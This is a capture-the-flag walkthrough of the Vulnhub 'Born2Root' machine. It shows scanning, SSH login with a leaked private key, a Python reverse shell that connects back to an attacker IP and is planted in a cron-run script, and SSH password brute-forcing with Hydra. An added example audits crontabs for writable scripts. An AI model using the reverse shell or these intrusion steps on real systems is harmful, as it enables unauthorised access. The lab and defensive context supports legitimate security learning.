Born2Root – Vulnhub CTF Challenge Walkthrough

Born2Root is available at Vulnhub. This VM is rated for “Intermediates”. Getting your first shell is easy, but getting root is a little more difficult. There are two ways to get root; the “intended” way is not configured correctly, so we use brute-forcing instead.

Turn on the machine and use netdiscover to determine its IP address. Then add this IP to your local hosts file, “/etc/hosts”.

Run a full-port Nmap scan.

An HTTP server is running.

The source code of the default web page has nothing useful, so we check the “robots.txt” file.

We then try some directory brute-forcing.

These are default Apache directories; we check “/icons/”.

“VDSoyuAXIO.txt” contains an RSA private key.

Try logging in as user “martin” using this private key. When prompted for the password, hit enter.

chmod 600 key
ssh martin@root.local -i key

We got a low-privileged shell; we need to enumerate further to get root. There are some privilege escalation techniques at https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html that you can use. Type:

cat /etc/cron*

There is a file “sekurity.py” which is owned by user “jimmy”. We can write a reverse shell from Pentest Monkey into this file.

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

After a while, on our Netcat listener, we got a reverse shell.
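The escalation above depends on cron running a script that another local account can write. The following added example (not part of the original walkthrough) audits /etc/crontab-style text for that condition from the defender's side; the sample crontab lines, the temporary directory layout and the function names are constructed for illustration.

```python
import os, re, stat, tempfile

# /etc/crontab-style line: five schedule fields, the run-as user, then the command.
JOB = re.compile(r"^(?:\S+\s+){5}(\S+)\s+(.+)$")

def cron_jobs(text):
    """Yield (user, command) for each job line, skipping comments and VAR=value."""
    for line in map(str.strip, text.splitlines()):
        if line and not line.startswith("#") and not re.match(r"\w+\s*=", line):
            m = JOB.match(line)
            if m:
                yield m.group(1), m.group(2)

def path_findings(path):
    """Reasons another local account could supply or replace what cron runs."""
    reasons = []
    try:
        mode = os.stat(path).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group/world-writable")
    except FileNotFoundError:
        mode = None
        reasons.append("missing")
    parent = os.path.dirname(path)
    if not os.path.isdir(parent):
        return reasons
    pmode = os.stat(parent).st_mode
    # In a sticky directory (e.g. /tmp) others cannot replace an existing file,
    # but anyone can still create one that does not exist yet.
    if pmode & stat.S_IWOTH and (mode is None or not pmode & stat.S_ISVTX):
        reasons.append("parent directory world-writable")
    return reasons

def audit(crontab_text):
    """Return (user, path, reasons) for each flagged absolute path in a job."""
    hits = ((u, p, path_findings(p)) for u, c in cron_jobs(crontab_text)
            for p in re.findall(r"(?<!\S)/[^\s;&|]+", c))
    return [h for h in hits if h[2]]

def demo():
    """Constructed layout: one job points at a missing script in an open directory."""
    root = tempfile.mkdtemp()
    drop, safe = os.path.join(root, "drop"), os.path.join(root, "safe.py")
    os.mkdir(drop); os.chmod(drop, 0o1777)          # behaves like /tmp
    open(safe, "w").close(); os.chmod(safe, 0o755)  # owner-only write, not flagged
    text = f"# constructed sample\nSHELL=/bin/sh\n*/5 * * * * jimmy python {drop}/sekurity.py\n0 3 * * * root {safe}\n"
    return audit(text)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

On a real host, pass the contents of /etc/crontab and the files under /etc/cron.d to audit(); per-user crontabs have no user field and need a different pattern.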

 

Jimmy’s home directory contains a file, “networker”, which the VM author created for privilege escalation, but this file does not work properly. Another way to get root is to brute-force the “hadi” account using “Hydra” or any other tool. After brute-forcing, we find that “hadi123” is the SSH password for “hadi”. You can generate the dictionary using “crunch” or “cupp”. Now, try logging in.

Finally, we got ROOT.
